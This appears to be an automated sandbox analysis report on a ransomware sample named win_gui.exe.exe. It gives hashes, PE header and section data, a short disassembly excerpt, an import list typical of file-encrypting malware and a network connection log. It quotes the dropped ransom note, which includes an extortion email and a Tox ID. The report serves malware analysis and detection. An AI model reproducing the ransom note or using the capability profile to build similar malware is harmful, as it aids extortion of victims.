                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874709719588937
                                Encrypted:false
                                SSDEEP:48:6IIuN5UJMo1YifEKlnSlck/WyYu+MAVMJg6T8W:6IIjJ1TEenS5evuAVOl
                                MD5:B41ACD7199A638614A8A7E8CB7047AF4
                                SHA1:B006CA9539443DAD8D7E078006FD14A0E15755C3
                                SHA-256:67C62F3B4B6B81A3466836B74AB924D795F27364CC0D8EB1886E5E7F25469F34
                                SHA-512:A6F7D71ED3F513A25FD7C6BA61EF840055E3F08A546E1A7F69AFC5326EF2109707D530C690473C883E57B8F975F74538E65FFDB7AB5763E83180C82951CD080C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8745675624570675
                                Encrypted:false
                                SSDEEP:48:lU0V46X8FOestKRjapG/WyYu+MAVMJg6T0:lU0e6r5KRjapGevuAVO0
                                MD5:8AF247AF08B25B06A4579412AD7FD0FF
                                SHA1:8DFD511C770C460EAF6D5E73BC4973ACC6A18395
                                SHA-256:E74CFF87B4A588D7A804FD9FDE0BB7CEBD163B1DCADF588B8D9AD321A78D7B95
                                SHA-512:E48D55A55B46FF8F2F3E0DFA54985BB2C563C2136A256DE44112C97C679C7388EE2B4887EC4557F16A519AD4E59908C556F79FEE6F01883A5DEFBF6BAAB4F746
                                Malicious:false
                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Entropy (8bit):6.861955678814033
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:win_gui.exe.exe
                                File size:1'753'088 bytes
                                MD5:63e4d0e113333b0bd2af6adb9f06c639
                                SHA1:34439e3b52a4fea160aee4f52add18d0239bd991
                                SHA256:41e8d712ef343d367f7f6331a68d6e31ec6830d6f38bec00e72b2915fa697244
                                SHA512:a8cd908629cd8d0595a474c1786138afdcb12c9c7acb9220eb41c95c42d1b28dbce667d0cd16b284b2bfeab660838fd2bb718a1f017d60f5004ec7786ac0b4a7
                                SSDEEP:49152:oNFRbMHLycKTKP/2k067kIVuFerAeFPas6giG:oN02c6g2H6RucrAe
                                TLSH:7A85C011FBC19AB2DC93153855A2EB3B0A39FE305725C6D387D029658D326E12B3F396
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Hg.............................!............@..........................`.......#....@................................
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x4121a1
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x67485F1D [Thu Nov 28 12:16:29 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:f3e9a441fd31627bce18580f89b04ac1
                                Instruction
                                call 00007F18BC906398h
                                jmp 00007F18BC905F6Fh
                                push ebp
                                mov ebp, esp
                                mov eax, dword ptr [ebp+08h]
                                push esi
                                mov ecx, dword ptr [eax+3Ch]
                                add ecx, eax
                                movzx eax, word ptr [ecx+14h]
                                lea edx, dword ptr [ecx+18h]
                                add edx, eax
                                movzx eax, word ptr [ecx+06h]
                                imul esi, eax, 28h
                                add esi, edx
                                cmp edx, esi
                                je 00007F18BC90610Bh
                                mov ecx, dword ptr [ebp+0Ch]
                                cmp ecx, dword ptr [edx+0Ch]
                                jc 00007F18BC9060FCh
                                mov eax, dword ptr [edx+08h]
                                add eax, dword ptr [edx+0Ch]
                                cmp ecx, eax
                                jc 00007F18BC9060FEh
                                add edx, 28h
                                cmp edx, esi
                                jne 00007F18BC9060DCh
                                xor eax, eax
                                pop esi
                                pop ebp
                                ret
                                mov eax, edx
                                jmp 00007F18BC9060EBh
                                push esi
                                call 00007F18BC9068B5h
                                test eax, eax
                                je 00007F18BC906112h
                                mov eax, dword ptr fs:[00000018h]
                                mov esi, 00516284h
                                mov edx, dword ptr [eax+04h]
                                jmp 00007F18BC9060F6h
                                cmp edx, eax
                                je 00007F18BC906102h
                                xor eax, eax
                                mov ecx, edx
                                lock cmpxchg dword ptr [esi], ecx
                                test eax, eax
                                jne 00007F18BC9060E2h
                                xor al, al
                                pop esi
                                ret
                                mov al, 01h
                                pop esi
                                ret
                                push ebp
                                mov ebp, esp
                                cmp dword ptr [ebp+08h], 00000000h
                                jne 00007F18BC9060F9h
                                mov byte ptr [00516288h], 00000001h
                                call 00007F18BC9066A3h
                                call 00007F18BC99B048h
                                test al, al
                                jne 00007F18BC9060F6h
                                xor al, al
                                pop ebp
                                ret
                                call 00007F18BC99D671h
                                test al, al
                                jne 00007F18BC9060FCh
                                push 00000000h
                                call 00007F18BC99B04Fh
                                pop ecx
                                jmp 00007F18BC9060DBh
                                mov al, 01h
                                pop ebp
                                ret
                                push ebp
                                mov ebp, esp
                                cmp byte ptr [00516289h], 00000000h
                                je 00007F18BC9060F6h
                                mov al, 01h
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10b53c | 0x154 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11b000 | 0xa490 | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x10ab4c | 0x38 | .rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x10ab88 | 0x40 | .rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0xc1000 | 0x474 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0xbf9b4 | 0xbfa00 | 5d7c085cddeabd744f00d6148513f8eb | False | 0.5078876691943901 | data | 6.647144113085254 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata | 0xc1000 | 0x4be2a | 0x4c000 | 3fa91f754729d1dc16d182a5693ce9e1 | False | 0.5044298673930921 | data | 6.220535718982431 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0x10d000 | 0xd490 | 0x9400 | 5609b39a4a1dcd1277f6f9fed68eb434 | False | 0.747387035472973 | DOS executable (block device driver \277DN) | 6.6823693087063125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .reloc | 0x11b000 | 0xa490 | 0xa600 | 603a58bd0564b031b21bf1844975c9d6 | False | 0.6193053463855421 | data | 6.622592328880688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                DLL | Import
                                KERNEL32.dll | GetProcessId, CreateToolhelp32Snapshot, LoadLibraryA, Module32FirstW, GetProcAddress, FreeLibrary, FindFirstVolumeW, GetSystemDefaultUILanguage, TerminateProcess, SetFilePointer, GetLocaleInfoW, OpenProcess, GetLogicalDriveStringsW, Process32NextW, Process32FirstW, GetNativeSystemInfo, SetVolumeMountPointW, FindVolumeClose, GetVolumePathNamesForVolumeNameW, FindNextVolumeW, GetTickCount, GetDriveTypeW, GetModuleHandleW, GetComputerNameW, CreateThread, GlobalFree, GlobalAlloc, PostQueuedCompletionStatus, ExitThread, GetQueuedCompletionStatus, LeaveCriticalSection, DeleteTimerQueue, EnterCriticalSection, CreateTimerQueueTimer, CancelIo, GetProcessHeap, DecodePointer, SetEndOfFile, HeapSize, FlushFileBuffers, GetConsoleCP, HeapReAlloc, GetStringTypeW, SetStdHandle, HeapAlloc, LCMapStringW, CompareStringW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, DeleteFileW, CreateDirectoryW, GetVersionExW, GetCommandLineW, InterlockedIncrement, HeapFree, CopyFileW, WaitForSingleObject, CreateMutexA, WriteConsoleW, GetStdHandle, lstrlenW, MoveFileW, lstrcpyW, WideCharToMultiByte, ExitProcess, DeleteCriticalSection, SetFilePointerEx, CloseHandle, lstrcatW, GetLastError, SetFileAttributesW, GetFileAttributesW, CreateFileW, GetEnvironmentVariableW, InitializeCriticalSection, GetModuleFileNameW, WriteFile, GetFileSizeEx, ReadFile, lstrcmpW, lstrcmpiW, MultiByteToWideChar, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, lstrlenA, SetConsoleCtrlHandler, GetACP, GetModuleHandleExW, GetModuleFileNameA, RaiseException, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, SetConsoleMode, ReadConsoleW, ReadConsoleA, GetConsoleMode, GetSystemInfo, FindClose, InterlockedDecrement, FindNextFileW, FindFirstFileW, LocalFree, GetCurrentProcess, CreateTimerQueue, Sleep, CreateProcessW, ConvertFiberToThread, GlobalMemoryStatus, DeleteFiber, GetFileType, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, CreateIoCompletionPort
                                USER32.dll | KillTimer, AppendMenuW, SetMenu, MoveWindow, RegisterHotKey, RegisterClassW, SetTimer, CreatePopupMenu, UnregisterClassW, SendMessageW, PostQuitMessage, GetProcessWindowStation, GetUserObjectInformationW, CreateMenu, UpdateWindow, EnableWindow, CreateWindowExW, MessageBoxW, IsWindowVisible, DestroyWindow, GetWindowRect, PostMessageW, wvsprintfW, ShowWindow, TranslateMessage, DispatchMessageW, GetMessageW, PeekMessageW, MessageBoxA, GetKeyState, UnregisterHotKey, DefWindowProcW
                                GDI32.dll | CreateFontW, DeleteObject
                                COMDLG32.dll | GetOpenFileNameW
                                ADVAPI32.dll | CryptEnumProvidersW, CryptDestroyHash, CloseServiceHandle, OpenSCManagerW, ControlService, EnumDependentServicesW, OpenServiceW, QueryServiceStatusEx, AllocateAndInitializeSid, FreeSid, CheckTokenMembership, RegCreateKeyA, RegCloseKey, RegSetValueExW, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, LookupPrivilegeValueW, SetSecurityDescriptorDacl, AdjustTokenPrivileges, SetSecurityDescriptorOwner, SetEntriesInAclW, SetNamedSecurityInfoW, GetNamedSecurityInfoW, OpenProcessToken, InitializeSecurityDescriptor, BuildTrusteeWithSidW, GetUserNameW, LookupAccountNameW, CryptCreateHash, DeregisterEventSource, RegisterEventSourceW, ReportEventW, CryptAcquireContextW, CryptDestroyKey, CryptSetHashParam, CryptGetProvParam, CryptGetUserKey, CryptExportKey, CryptDecrypt, CryptSignHashW
                                SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, DragAcceptFiles, DragQueryFileW, SHGetSpecialFolderPathW, SHEmptyRecycleBinW, ShellExecuteW, CommandLineToArgvW, SHGetMalloc
                                ole32.dll | CoInitializeSecurity, CoInitializeEx, CoTaskMemFree, CoSetProxyBlanket, CoCreateInstance, CoUninitialize
                                OLEAUT32.dll | VariantInit, VariantClear
                                SHLWAPI.dll | StrStrIW, StrCmpNW, StrStrIA, StrToIntW, StrStrA
                                CRYPT32.dll | CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty, CertEnumCertificatesInStore, CertCloseStore, CertOpenStore, CertFindCertificateInStore
                                IPHLPAPI.DLL | GetIpNetTable
                                NETAPI32.dll | NetApiBufferFree, NetShareEnum
                                MPR.dll | WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
                                WS2_32.dll | recv, send, WSAIoctl, closesocket, bind, WSACleanup, WSASetLastError, shutdown, WSASocketW, WSAGetLastError, setsockopt, freeaddrinfo, htons, getsockopt, gethostname, inet_ntoa, WSAAddressToStringW, socket, WSAStartup, getaddrinfo, gethostbyname
                                WININET.dll | InternetCloseHandle, InternetOpenUrlW, InternetReadFile, InternetOpenW
                                COMCTL32.dll |
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 3, 2024 17:51:07.960091114 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.960236073 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.960282087 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.960352898 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.960385084 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.963057995 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.963072062 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.963253975 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.963270903 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.964915037 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.964926004 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.965008974 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.965126038 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.965133905 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.968142986 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.968157053 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.978461981 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.978487968 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.986491919 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.986499071 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.988152027 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.988167048 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.988250017 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.988260031 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.778958082 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.797167063 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.823120117 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.823143959 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.823626995 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.823632002 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.824580908 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.824609995 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.825000048 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.825006008 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.835530043 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.842741013 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.859752893 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.886225939 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.886360884 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.906553030 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.997323036 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.997342110 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.997895956 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.997900009 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.045852900 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.045878887 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.047202110 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.047209978 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.081068039 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.081089020 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.081583977 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.081588030 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.230628967 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.230653048 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.232297897 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232316971 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.232434988 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232815027 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232821941 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.232837915 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232981920 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.233010054 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.234596968 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.235872030 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.235897064 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.236046076 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.236633062 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.236644030 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.250350952 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.250374079 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.250883102 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.251837969 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.252412081 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.252430916 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.252443075 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.252449036 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.260380030 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.260410070 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.260997057 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.265733957 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.265747070 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.267668962 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:10.315323114 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.341692924 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.341717005 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.342374086 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.342392921 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.342441082 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.342746973 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.342802048 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.343322992 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.343595028 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.343611002 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.343622923 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.343630075 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.348278046 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.348298073 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.349086046 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.349479914 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.349488020 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.382780075 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.382863998 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.383050919 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.383088112 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.383095980 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.383106947 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.383111000 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.386296988 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.386327982 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.386689901 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.387540102 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.387561083 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.415348053 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.415404081 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.416158915 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.416992903 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.417002916 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.417013884 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.417018890 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.425035000 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.425061941 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.425148010 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.431025982 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.431040049 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.849056005 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849078894 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849087954 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849114895 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849133968 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849140882 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849309921 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:10.849323034 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849370003 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:10.868252039 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.868263006 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.868347883 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.869247913 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:12.046153069 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.047564030 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.047581911 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.048068047 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.048073053 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.083168030 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.083606005 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.083626986 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.084064007 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.084068060 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.136091948 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.136590958 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.136626005 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.137065887 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.137069941 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.177660942 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.189028978 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.189064026 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.189524889 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.189532995 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.225615978 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.228106022 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.228132010 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.228568077 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.228571892 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.492022038 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.492089987 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.496692896 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.498174906 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.498192072 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.498205900 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.498210907 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.502981901 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.503021955 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.503093004 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.503251076 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.503268003 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.582384109 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.582457066 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.591331005 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.596973896 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.614166021 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.614227057 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.623326063 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.625089884 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.625143051 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.628226042 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.628241062 CET49977443192.168.2.513.107.246.63
